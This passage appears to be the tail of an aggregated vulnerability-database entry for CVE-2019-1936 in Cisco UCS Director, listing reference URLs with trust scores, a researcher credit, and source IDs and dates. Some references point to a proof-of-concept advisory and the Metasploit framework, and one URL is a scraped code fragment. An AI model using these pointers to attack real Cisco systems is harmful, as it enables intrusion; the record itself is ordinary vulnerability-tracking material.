url:https://10.0.3.100/app/ui/login.jsp

Trust: 0.1

url:https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-director/index.html

Trust: 0.1

url:https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-director/rack-server-guide/6-7/cisco-ucs-director-rack-server-mgmt-guide-67/cisco-ucs-director-rack-server-mgmt-guide-67_chapter_01011.html#task_1599289a49fb49d48486a66a8358a2ad

Trust: 0.1

url:https://www.gnu.org/licenses/gpl-3.0.en.html

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190821-imcs-usercred

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-1935

Trust: 0.1

url:https://www.cisco.com/c/en/us/support/servers-unified-computing/ucs-director-evaluation/model.html

Trust: 0.1

url:https://10.0.3.100/

Trust: 0.1

url:http://www.agileinfosec.co.uk/

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190821-imcs-ucs-cmdinj'

Trust: 0.1

url:https://github.com/rapid7/metasploit-framework

Trust: 0.1

url:https://raw.githubusercontent.com/pedrib/poc/master/advisories/cisco-ucs-rce.txt'

Trust: 0.1

url:https://metasploit.com/download

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190821-imcs-ucs-authby'

Trust: 0.1

url:https://#{rhost}#{rport

Trust: 0.1

sources: CNVD: CNVD-2019-42593 // VULHUB: VHN-151798 // VULMON: CVE-2019-1936 // JVNDB: JVNDB-2019-008542 // PACKETSTORM: 154239 // PACKETSTORM: 154308 // CNNVD: CNNVD-201908-1719 // NVD: CVE-2019-1936

CREDITS

independent security researcher Pedro Ribeiro to iDefense's Vulnerability Contributor Program.

Trust: 0.6

sources: CNNVD: CNNVD-201908-1719

SOURCES

db:CNVDid:CNVD-2019-42593
db:VULHUBid:VHN-151798
db:VULMONid:CVE-2019-1936
db:JVNDBid:JVNDB-2019-008542
db:PACKETSTORMid:154239
db:PACKETSTORMid:154308
db:CNNVDid:CNNVD-201908-1719
db:NVDid:CVE-2019-1936

LAST UPDATE DATE

2024-11-23T21:59:48.302000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2019-42593date:2019-11-28T00:00:00
db:VULHUBid:VHN-151798date:2023-03-03T00:00:00
db:VULMONid:CVE-2019-1936date:2023-03-03T00:00:00
db:JVNDBid:JVNDB-2019-008542date:2019-09-03T00:00:00
db:CNNVDid:CNNVD-201908-1719date:2019-09-04T00:00:00
db:NVDid:CVE-2019-1936date:2024-11-21T04:37:43.317

SOURCES RELEASE DATE

db:CNVDid:CNVD-2019-42593date:2019-11-28T00:00:00
db:VULHUBid:VHN-151798date:2019-08-21T00:00:00
db:VULMONid:CVE-2019-1936date:2019-08-21T00:00:00
db:JVNDBid:JVNDB-2019-008542date:2019-09-03T00:00:00
db:PACKETSTORMid:154239date:2019-08-28T19:18:22
db:PACKETSTORMid:154308date:2019-09-02T18:11:07
db:CNNVDid:CNNVD-201908-1719date:2019-08-21T00:00:00
db:NVDid:CVE-2019-1936date:2019-08-21T19:15:15.357